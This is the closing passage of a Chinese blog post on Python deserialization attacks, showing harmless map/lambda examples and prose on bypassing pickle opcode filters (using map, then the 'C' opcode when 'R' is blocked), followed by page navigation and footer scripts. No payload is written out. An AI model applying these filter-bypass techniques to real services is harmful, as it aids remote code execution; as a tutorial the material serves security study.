<span class="token operator">>></span><span class="token operator">></span> <span class="token builtin">map</span><span class="token punctuation">(</span>square<span class="token punctuation">,</span> <span class="token punctuation">[</span><span class="token number">1</span><span class="token punctuation">,</span><span class="token number">2</span><span class="token punctuation">,</span><span class="token number">3</span><span class="token punctuation">,</span><span class="token number">4</span><span class="token punctuation">,</span><span class="token number">5</span><span class="token punctuation">]</span><span class="token punctuation">)</span>   <span class="token comment"># 计算列表各个元素的平方</span>
<span class="token punctuation">[</span><span class="token number">1</span><span class="token punctuation">,</span> <span class="token number">4</span><span class="token punctuation">,</span> <span class="token number">9</span><span class="token punctuation">,</span> <span class="token number">16</span><span class="token punctuation">,</span> <span class="token number">25</span><span class="token punctuation">]</span>
<span class="token operator">>></span><span class="token operator">></span> <span class="token builtin">map</span><span class="token punctuation">(</span><span class="token keyword">lambda</span> x<span class="token punctuation">:</span> x <span class="token operator">**</span> <span class="token number">2</span><span class="token punctuation">,</span> <span class="token punctuation">[</span><span class="token number">1</span><span class="token punctuation">,</span> <span class="token number">2</span><span class="token punctuation">,</span> <span class="token number">3</span><span class="token punctuation">,</span> <span class="token number">4</span><span class="token punctuation">,</span> <span class="token number">5</span><span class="token punctuation">]</span><span class="token punctuation">)</span>  <span class="token comment"># 使用 lambda 匿名函数</span>
<span class="token punctuation">[</span><span class="token number">1</span><span class="token punctuation">,</span> <span class="token number">4</span><span class="token punctuation">,</span> <span class="token number">9</span><span class="token punctuation">,</span> <span class="token number">16</span><span class="token punctuation">,</span> <span class="token number">25</span><span class="token punctuation">]</span>

<span class="token comment"># 提供了两个列表，对相同位置的列表数据进行相加</span>
<span class="token operator">>></span><span class="token operator">></span> <span class="token builtin">map</span><span class="token punctuation">(</span><span class="token keyword">lambda</span> x<span class="token punctuation">,</span> y<span class="token punctuation">:</span> x <span class="token operator">+</span> y<span class="token punctuation">,</span> <span class="token punctuation">[</span><span class="token number">1</span><span class="token punctuation">,</span> <span class="token number">3</span><span class="token punctuation">,</span> <span class="token number">5</span><span class="token punctuation">,</span> <span class="token number">7</span><span class="token punctuation">,</span> <span class="token number">9</span><span class="token punctuation">]</span><span class="token punctuation">,</span> <span class="token punctuation">[</span><span class="token number">2</span><span class="token punctuation">,</span> <span class="token number">4</span><span class="token punctuation">,</span> <span class="token number">6</span><span class="token punctuation">,</span> <span class="token number">8</span><span class="token punctuation">,</span> <span class="token number">10</span><span class="token punctuation">]</span><span class="token punctuation">)</span>
<span class="token punctuation">[</span><span class="token number">3</span><span class="token punctuation">,</span> <span class="token number">7</span><span class="token punctuation">,</span> <span class="token number">11</span><span class="token punctuation">,</span> <span class="token number">15</span><span class="token punctuation">,</span> <span class="token number">19</span><span class="token punctuation">]</span><span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre>

<p><code>map</code> 函数在 Python 中是一种高阶函数，它接收一个函数和一个可迭代对象（如列表、元组、字典等）作为参数，然后对可迭代对象中的每个元素应用指定的函数，并返回一个迭代器。</p>
<p>简单来说便是可以接受一个参数，传到指定的函数当中来使用，这样边可以成功绕过改过滤。</p>
<h3 id="C指令的妙用"><a href="#C指令的妙用" class="headerlink" title="C指令的妙用"></a>C指令的妙用</h3><p>当完全过滤R指令时，上面的方法便无法使用，这个时候便可以使用C指令，c指令，就是指用 C 语言编写的程序代码，可以使用 Python 的 ctypes 模块来调用 C 语言函数和操作 C 语言数据类型。通过 ctypes 模块，Python 程序可以像操作自己的内部数据类型一样操作 C 语言的数据类型和函数。</p>
<p><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="/../../../source/images/python%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96.assets/R%E8%BF%87%E6%BB%A4.png"
                     
                ></p>

            </div>

            
                <div class="post-copyright-info">
                    <div class="article-copyright-info-container">
    <ul>
        <li><strong>Title:</strong> </li>
        <li><strong>Author:</strong> 阿巴</li>
        <li><strong>Created at:</strong> 2023-12-08 14:45:23</li>
        
            <li>
                <strong>Updated at:</strong> 2023-09-08 20:07:30
            </li>
        
        <li>
            <strong>Link:</strong> https://redefine.ohevan.com/2023/12/08/python反序列化/
        </li>
        <li>
            <strong>License:</strong> This work is licensed under <a class="license" target="_blank" rel="noopener" href="https://creativecommons.org/licenses/by-nc-sa/4.0/deed.zh">CC BY-NC-SA 4.0</a>.
        </li>
    </ul>
</div>

                </div>
            

            

            

            
                <div class="article-nav">
                    
                        <div class="article-prev">
                            <a class="prev"
                            rel="prev"
                            href="/2023/12/08/%E5%88%A9%E7%94%A8imagick%E8%BF%9B%E8%A1%8C%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0/"
                            >
                                <span class="left arrow-icon flex-center">
                                    <i class="fa-solid fa-chevron-left"></i>
                                </span>
                                <span class="title flex-center">
                                    <span class="post-nav-title-item"></span>
                                    <span class="post-nav-item">Prev posts</span>
                                </span>
                            </a>
                        </div>
                    
                    
                        <div class="article-next">
                            <a class="next"
                            rel="next"
                            href="/2023/12/08/python%E5%8E%9F%E5%9E%8B%E9%93%BE%E6%B1%A1%E6%9F%93/"
                            >
                                <span class="title flex-center">
                                    <span class="post-nav-title-item"></span>
                                    <span class="post-nav-item">Next posts</span>
                                </span>
                                <span class="right arrow-icon flex-center">
                                    <i class="fa-solid fa-chevron-right"></i>
                                </span>
                            </a>
                        </div>
                    
                </div>
            


            
        </div>

        
            <div class="toc-content-container">
                <div class="post-toc-wrap">
    <div class="post-toc">
        <div class="toc-title">On this page</div>
        <div class="page-title"></div>
        <ol class="nav"><li class="nav-item nav-level-1"><a class="nav-link" href="#python%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96"><span class="nav-text">python反序列化</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#%E5%BA%8F%E5%88%97%E5%8C%96%E6%96%B9%E5%BC%8F"><span class="nav-text">序列化方式</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#json%E6%A0%BC%E5%BC%8F"><span class="nav-text">json格式</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#pickle%E6%A0%BC%E5%BC%8F"><span class="nav-text">pickle格式</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E5%B8%B8%E7%94%A8%E7%9A%84%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C%E7%9A%84%E6%96%B9%E6%B3%95"><span class="nav-text">常用的命令执行的方法</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#reduce-%E6%96%B9%E6%B3%95"><span class="nav-text">__reduce__方法</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#C%E6%8C%87%E4%BB%A4%E7%9A%84%E5%A6%99%E7%94%A8"><span class="nav-text">C指令的妙用</span></a></li></ol></li></ol></li></ol>

    </div>
</div>
            </div>
        
    </div>
</div>


                

            </div>
            
            

        </div>

        <div class="main-content-footer">
            <footer class="footer">
    <div class="info-container">
        <div class="copyright-info">
            &copy;
            
              <span>Invalid date</span>
              -
            
            2023&nbsp;&nbsp;<i class="fa-solid fa-heart fa-beat" style="--fa-animation-duration: 0.5s; color: #f54545"></i>&nbsp;&nbsp;<a href="/">阿巴</a>
        </div>
        
            <script async data-pjax src="//busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js"></script>
            <div class="website-count info-item">
                
                    <span id="busuanzi_container_site_uv" class="busuanzi_container_site_uv">
                        VISITOR COUNT&nbsp;<span id="busuanzi_value_site_uv" class="busuanzi_value_site_uv"></span>
                    </span>
                
                
                    <span id="busuanzi_container_site_pv" class="busuanzi_container_site_pv">
                        TOTAL PAGE VIEWS&nbsp;<span id="busuanzi_value_site_pv" class="busuanzi_value_site_pv"></span>
                    </span>
                
            </div>
        
        <div class="theme-info info-item">
            <span class="powered-by-container">POWERED BY <?xml version="1.0" encoding="utf-8"?><!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd"><svg version="1.1" id="圖層_1" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" x="0px" y="0px" width="1rem" height="1rem" viewBox="0 0 512 512" enable-background="new 0 0 512 512" xml:space="preserve"><path fill="#0E83CD" d="M256.4,25.8l-200,115.5L56,371.5l199.6,114.7l200-115.5l0.4-230.2L256.4,25.8z M349,354.6l-18.4,10.7l-18.6-11V275H200v79.6l-18.4,10.7l-18.6-11v-197l18.5-10.6l18.5,10.8V237h112v-79.6l18.5-10.6l18.5,10.8V354.6z"/></svg><a target="_blank" href="https://hexo.io">Hexo</a></span>
                <br>
            <span class="theme-version-container">THEME&nbsp;<a class="theme-version" target="_blank" href="https://github.com/EvanNotFound/hexo-theme-redefine">Redefine v2.2.2</a>
        </div>
        
        
        
            <div>
                Blog up for <span class="odometer" id="runtime_days" ></span> days <span class="odometer" id="runtime_hours"></span> hrs <span class="odometer" id="runtime_minutes"></span> Min <span class="odometer" id="runtime_seconds"></span> Sec
            </div>
        
        
        
            <script async data-pjax>
                try {
                    function odometer_init() {
                    const elements = document.querySelectorAll('.odometer');
                    elements.forEach(el => {
                        new Odometer({
                            el,
                            format: '( ddd).dd',
                            duration: 200
                        });
                    });
                    }
                    odometer_init();
                } catch (error) {}
            </script>
        
        
        
    </div>  
</footer>
        </div>
    </div>

    
        <div class="post-tools">
            <div class="post-tools-container">
    <ul class="article-tools-list">
        <!-- TOC aside toggle -->
        
            <li class="right-bottom-tools page-aside-toggle">
                <i class="fa-regular fa-outdent"></i>
            </li>
        

        <!-- go comment -->
        
    </ul>
</div>

        </div>
    

    <div class="right-side-tools-container">
        <div class="side-tools-container">
    <ul class="hidden-tools-list">
        <li class="right-bottom-tools tool-font-adjust-plus flex-center">
            <i class="fa-regular fa-magnifying-glass-plus"></i>
        </li>

        <li class="right-bottom-tools tool-font-adjust-minus flex-center">
            <i class="fa-regular fa-magnifying-glass-minus"></i>
        </li>

        <li class="right-bottom-tools tool-expand-width flex-center">
            <i class="fa-regular fa-expand"></i>
        </li>

        <li class="right-bottom-tools tool-dark-light-toggle flex-center">
            <i class="fa-regular fa-moon"></i>
        </li>

        <!-- rss -->
        

        

        <li class="right-bottom-tools tool-scroll-to-bottom flex-center">
            <i class="fa-regular fa-arrow-down"></i>
        </li>
    </ul>

    <ul class="visible-tools-list">
        <li class="right-bottom-tools toggle-tools-list flex-center">
            <i class="fa-regular fa-cog fa-spin"></i>
        </li>
        
            <li class="right-bottom-tools tool-scroll-to-top flex-center">
                <i class="arrow-up fas fa-arrow-up"></i>
                <span class="percent"></span>
            </li>
        
        
    </ul>
</div>

    </div>

    <div class="image-viewer-container">
    <img src="">
</div>


    


</main>




<script src="/js/utils.js"></script>

<script src="/js/main.js"></script>

<script src="/js/layouts/navbarShrink.js"></script>

<script src="/js/tools/scrollTopBottom.js"></script>

<script src="/js/tools/lightDarkSwitch.js"></script>





    
<script src="/js/tools/codeBlock.js"></script>




    
<script src="/js/layouts/lazyload.js"></script>




    
<script src="/js/tools/runtime.js"></script>

    
<script src="/js/libs/odometer.min.js"></script>

    
<link rel="stylesheet" href="/assets/odometer-theme-minimal.css">




  
<script src="/js/libs/Typed.min.js"></script>

  
<script src="/js/plugins/typed.js"></script>







<div class="post-scripts pjax">
    
        
<script src="/js/tools/tocToggle.js"></script>

<script src="/js/libs/anime.min.js"></script>

<script src="/js/layouts/toc.js"></script>

<script src="/js/plugins/tabs.js"></script>

    
</div>


    
<script src="/js/libs/pjax.min.js"></script>

<script>
    window.addEventListener('DOMContentLoaded', () => {
        window.pjax = new Pjax({
            selectors: [
                'head title',
                '.page-container',
                '.pjax',
            ],
            history: true,
            debug: false,
            cacheBust: false,
            timeout: 0,
            analytics: false,
            currentUrlFullReload: false,
            scrollRestoration: false,
            // scrollTo: true,
        });

        document.addEventListener('pjax:send', () => {
            Global.utils.pjaxProgressBarStart();
        });

        document.addEventListener('pjax:complete', () => {
            Global.utils.pjaxProgressBarEnd();
            window.pjax.executeScripts(document.querySelectorAll('script[data-pjax], .pjax script'));
            Global.refresh();
        });
    });
</script>




</body>
</html>
